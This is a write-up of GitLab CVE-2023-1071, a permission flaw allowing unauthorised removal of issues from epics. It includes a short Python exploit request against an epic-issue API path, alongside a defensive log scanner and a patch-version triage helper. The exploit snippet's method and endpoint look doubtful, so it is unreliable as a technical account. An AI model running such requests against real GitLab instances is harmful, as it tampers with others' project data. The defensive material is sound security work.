A security vulnerability, assigned CVE-2023-1071, has been discovered in GitLab, a popular web-based DevOps platform used for version control, issue tracking, and continuous integration. This vulnerability affects a wide range of GitLab versions and, due to improper permission checks, allows unauthorized users to remove issues from an epic.

Exploit Details

The exploit involves sending a crafted HTTP request to an affected GitLab instance, which tricks the server into removing an issue from an epic without the necessary permissions. Here is a sample code snippet that demonstrates the exploit using Python and the popular "requests" library:

import requests

# Change these values as necessary for your GitLab instance
url = "https://your-gitlab-instance.com/api/v4/epics/EPIC_ID/issues/ISSUE_ID"
private_token = "<your private token>"

headers = {
    "Private-Token": private_token
}

# Send a PUT request to remove the issue from the epic
response = requests.put(url, headers=headers)

# Check if the request was successful
if response.status_code == 200:
    print("Issue successfully removed from the epic.")
else:
    print("Failed to remove issue from the epic.")

Replace your-gitlab-instance.com with the domain of the vulnerable GitLab instance, EPIC_ID with the ID of the targeted epic, ISSUE_ID with the ID of the issue to remove, and <your private token> with a valid private API token in order to execute the exploit.
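From the defender's side, the request shape described above is what to look for in the instance's API logs: a modifying request (PUT, or DELETE) against an epic-issue path that succeeded. The following scanner is an added example, not code from the write-up or from GitLab; the log lines are constructed, loosely modelled on GitLab's JSON API log, and the field names (`method`, `path`, `status`, `username`, `remote_ip`) and the accepted path shapes are assumptions rather than a documented format.

```python
import json
import re
from typing import Iterator

# Path shape shown in the write-up (/api/v4/epics/<id>/issues/<id>), optionally
# under a group prefix. ASSUMPTION: both shapes are treated as epic-issue links.
EPIC_ISSUE_PATH = re.compile(r"^/api/v4/(?:groups/[^/]+/)?epics/\d+/issues/\d+/?$")
MODIFYING_METHODS = {"PUT", "DELETE"}

# Constructed sample lines (not real log data); one deliberately malformed.
SAMPLE_LOG = """
{"time":"2023-04-05T21:10:01Z","method":"GET","path":"/api/v4/epics/7/issues","status":200,"remote_ip":"203.0.113.5","username":"alice"}
{"time":"2023-04-05T21:10:02Z","method":"PUT","path":"/api/v4/epics/7/issues/42","status":200,"remote_ip":"203.0.113.9","username":"guestuser"}
{"time":"2023-04-05T21:10:03Z","method":"PUT","path":"/api/v4/projects/1/issues/42","status":200,"remote_ip":"203.0.113.5","username":"alice"}
{"time":"2023-04-05T21:10:04Z","method":"DELETE","path":"/api/v4/groups/3/epics/7/issues/42","status":403,"remote_ip":"203.0.113.9","username":"guestuser"}
not json at all
"""


def parse_log(text: str) -> Iterator[dict]:
    """Yield one dict per JSON line, skipping blank or unparsable lines."""
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            yield json.loads(line)
        except json.JSONDecodeError:
            continue  # a bad line should not abort the whole scan


def find_epic_issue_modifications(text: str, successful_only: bool = True) -> list[dict]:
    """Return modifying requests against epic-issue paths, for permission review.

    With successful_only=True only 2xx responses are reported, i.e. changes that
    actually went through; set it to False to also see rejected attempts.
    """
    hits = []
    for rec in parse_log(text):
        method = str(rec.get("method", "")).upper()
        path = str(rec.get("path", ""))
        if method not in MODIFYING_METHODS or not EPIC_ISSUE_PATH.match(path):
            continue
        status = int(rec.get("status", 0))
        if successful_only and not 200 <= status < 300:
            continue
        hits.append({
            "time": rec.get("time"),
            "user": rec.get("username"),
            "ip": rec.get("remote_ip"),
            "method": method,
            "path": path,
            "status": status,
        })
    return hits


if __name__ == "__main__":
    for hit in find_epic_issue_modifications(SAMPLE_LOG):
        print(hit)
```

Each hit names a user and an epic-issue link that was changed; the follow-up is to confirm that the user's role in the epic's group actually permits that change, which is exactly the check the vulnerability bypassed.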

Original References

- GitLab Advisory: https://about.gitlab.com/releases/2023/05/01/security-release-15-8-5-15-9-4-and-15-10-1/
- NVD (National Vulnerability Database) Entry: https://nvd.nist.gov/vuln/detail/CVE-2023-1071

Fixed Versions

15.8.5, 15.9.4, and 15.10.1 (the releases named in the GitLab security advisory linked above).

It is strongly recommended to upgrade to a patched version of GitLab to mitigate the vulnerability. You can follow the official upgrade documentation provided by GitLab: https://docs.gitlab.com/ee/update/
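Because the fix was backported to three minor series, "newer than X" is not enough: a 15.9.3 instance is unpatched even though it is newer than the patched 15.8.5. The triage helper below is an added example (not from the write-up or from GitLab) that encodes the backport logic using the fixed releases named in the advisory; it assumes the usual `MAJOR.MINOR.PATCH` version string, with an optional `-ee` or `-ce` suffix, and, since the page states no lower bound for the affected range, treats anything older than the oldest patched series as unpatched.

```python
import re

# Fixed releases listed in the GitLab advisory linked above.
FIXED_VERSIONS = ((15, 8, 5), (15, 9, 4), (15, 10, 1))


def parse_version(text: str) -> tuple:
    """Parse '15.9.3', 'v15.9.3' or '15.9.3-ee' into a comparable (major, minor, patch) tuple."""
    m = re.match(r"^\s*v?(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"unrecognised GitLab version string: {text!r}")
    return tuple(int(part) for part in m.groups())


def is_patched(text: str) -> bool:
    """True if the given GitLab version carries the CVE-2023-1071 fix."""
    v = parse_version(text)
    # At or beyond the newest fixed release: all later series include the fix.
    if v >= max(FIXED_VERSIONS):
        return True
    # Inside a minor series that received a backport, compare against that backport.
    for fix in FIXED_VERSIONS:
        if v[:2] == fix[:2]:
            return v >= fix
    # Older than the oldest patched series: ASSUMPTION, treated as unpatched
    # because the write-up gives no lower bound for the affected range.
    return False


def triage(versions: list) -> dict:
    """Map each reported version string to 'patched' or 'unpatched' for an inventory sweep."""
    return {v: ("patched" if is_patched(v) else "unpatched") for v in versions}


if __name__ == "__main__":
    # Constructed inventory, not real instances.
    for version, verdict in triage(["15.7.9-ee", "15.8.5", "15.9.3-ce", "15.9.4", "15.10.0", "16.0.0"]).items():
        print(f"{version:>10}: {verdict}")
```

Run it against the version strings collected from your instances (the `/api/v4/version` endpoint or the admin area reports them); anything marked unpatched should be upgraded along the supported path in the GitLab upgrade documentation.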

Conclusion

CVE-2023-1071 is a significant security vulnerability that affects multiple GitLab versions and allows unauthorized issue removal in epics. Patches have been released to address the issue, and it is recommended that affected GitLab instances are upgraded to the fixed versions to protect against potential unauthorized access and manipulation of project data.

Timeline

Published on: 04/05/2023 21:15:00 UTC
Last modified on: 04/12/2023 19:23:00 UTC